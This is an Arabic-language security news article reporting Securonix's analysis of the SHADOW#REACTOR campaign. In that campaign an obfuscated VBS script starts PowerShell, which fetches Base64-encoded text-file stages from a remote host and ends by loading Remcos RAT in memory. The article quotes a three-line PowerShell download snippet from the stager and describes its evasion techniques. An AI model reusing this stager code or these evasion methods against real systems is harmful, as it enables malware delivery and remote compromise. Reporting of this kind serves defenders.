برمجيات خبيثة متعددة المراحل تستدعي برمجية تنزيل عبر “باور شل” باستخدام حمولات نصية من مضيف بعيد

كشف باحثون أمنيون عن حملة برمجيات خبيثة متقدمة متعددة المراحل تستهدف أنظمة ويندوز، وتُعرف باسم SHADOW#REACTOR، وتمثل هذه الحملة تطوراً مهماً في آليات تقديم أدوات الوصول عن بعد. تبرز الحملة كيفية دمج المهاجمين لتقنيات البرمجة النصية التقليدية مع أساليب التمويه الحديثة لتجاوز الدفاعات الأمنية.

تبدأ العدوى ببرنامج نصي مكتوب بلغة Visual Basic Script (VBS) بترميز معقد، يقوم بتشغيل سلسلة تنفيذ دقيقة المراحل، تم تصميم كل مرحلة منها لأداء وظائف محددة مع تقليل احتمالية الكشف عنها.

SHADOW#REACTOR: تطور استثنائي في تكتيكات توصيل البرمجيات الخبيثة

يعتمد المتجه الهجومي للحملة على تفاعل المستخدم، حيث يقوم الضحايا بتشغيل ملف VBS خبيث عن غير قصد، والذي يتم تقديمه عادةً عبر موارد ويب مخترقة أو حيل هندسة اجتماعية. بمجرد تشغيل البرنامج النصي، يقوم بتشغيل عمليات PowerShell التي تسحب أجزاء مشفرة من الحمولة من بنية تحتية عن بعد. تظل هذه الأجزاء مرمزة كملفات نصية عادية، مما يجنبها توقيعات الكشف الثنائية الشائعة.

هذا النهج المعياري يسمح للمهاجمين بتحديث المراحل الفردية بشكل مستقل دون الحاجة إلى إعادة هيكلة السلسلة بأكملها. وتُظهر الحملة مزيجًا غير عادي من تقنيات “العيش على الأرض” (Living-off-the-Land) وطبقات التمويه المخصصة.

يمرر كل طور تنفيذ السيطرة إلى الطور التالي من خلال عمليات تسليم مُدارة بعناية، مما يضمن سلامة الحمولة عبر عمليات تنزيل متعددة. وضع المهاجمون آليات تحقق من التكرار والتحقق من الحجم لضمان إعادة بناء الحمولة بنجاح.

قام محللو Securonix بتحديد البرمجيات الخبيثة بعد أن كشفت المرحلة الثانية عن أنماط مميزة في بناء أوامر PowerShell وعمليات فك ترميز Base64. تتبع فريق البحث اتصالات البنية التحتية وطابق توقيع الحمولة النهائية مع Remcos RAT، وهي أداة إدارة عن بعد متاحة تجاريًا تم إعادة استخدامها للاستخدام الضار.

كشف التحليل أن الكشف الأولي لمحللي Securonix ركز على ظهور instances متعددة لـ wscript.exe تقوم بتشغيل عمليات PowerShell مع أوامر مضمنة واسعة النطاق، وهو نمط سلوكي مميز نادرًا ما يُرى في عمليات Windows الشرعية.

خط أنابيب الترحيل النصي فقط: نهج تسليم مبتكر

السمة المميزة لـ SHADOW#REACTOR تكمن في آلية الترحيل غير التقليدية القائمة على النص. بدلاً من استضافة الحمولات الثنائية مباشرة، يحتفظ المهاجمون بالمحتوى المشفر في ملفات نصية بسيطة، بما في ذلك qpwoe32.txt، qpwoe64.txt، teste32.txt، teste64.txt، و config.txt. تحتوي هذه الملفات على كود تجميع مشفر بنظام Base64 يبدو كبيانات نصية غير ضارة لأنظمة الأمان الآلية التي تجري عمليات مسح روتينية.

يطبق برنامج ترحيل PowerShell حلقة تنزيل مع الحد الأدنى من عتبات الحجم وآليات انتهاء المهلة. إذا كان الملف الذي تم استرجاعه أقل من الأحجام المتوقعة، فإن البرنامج النصي يعاود التنزيل تلقائيًا، مما يضمن عدم مقاطعة عمليات الإخراج غير المكتملة للتنفيذ.

تسمح آلية المرونة هذه للمشغلين بإدارة تحديثات الحمولة دون تعطيل سلسلة العدوى بأكملها. بمجرد نجاح التحقق، تقوم المراحل اللاحقة بفك تشفير المحتوى وإعادة بنائه إلى تجميعات .NET وظيفية يتم تحميلها بالكامل في الذاكرة باستخدام تقنيات التحميل الانعكاسي.

$webClient = New-Object System.Net.WebClient
$uwehj = $webClient.DownloadString($mlkia)
$uwehj | Out-File -FilePath $Iuytq -Encoding UTF8

يُعقد نهج النص فقط بشكل كبير الكشف الثابت، حيث تميل الحلول الأمنية إلى تحديد الملفات التنفيذية الثنائية بدلاً من الملفات النصية التي تبدو غير ضارة. جنبًا إلى جنب مع التنفيذ في الذاكرة وتمويه سلسلة العمليات، يمثل خط أنابيب الترحيل هذا جهدًا محسوبًا للحفاظ على الاستمرارية مع تجنب أنظمة الكشف والاستجابة لنقاط النهاية المصممة لتحديد أنماط تسليم البرامج الضارة التقليدية.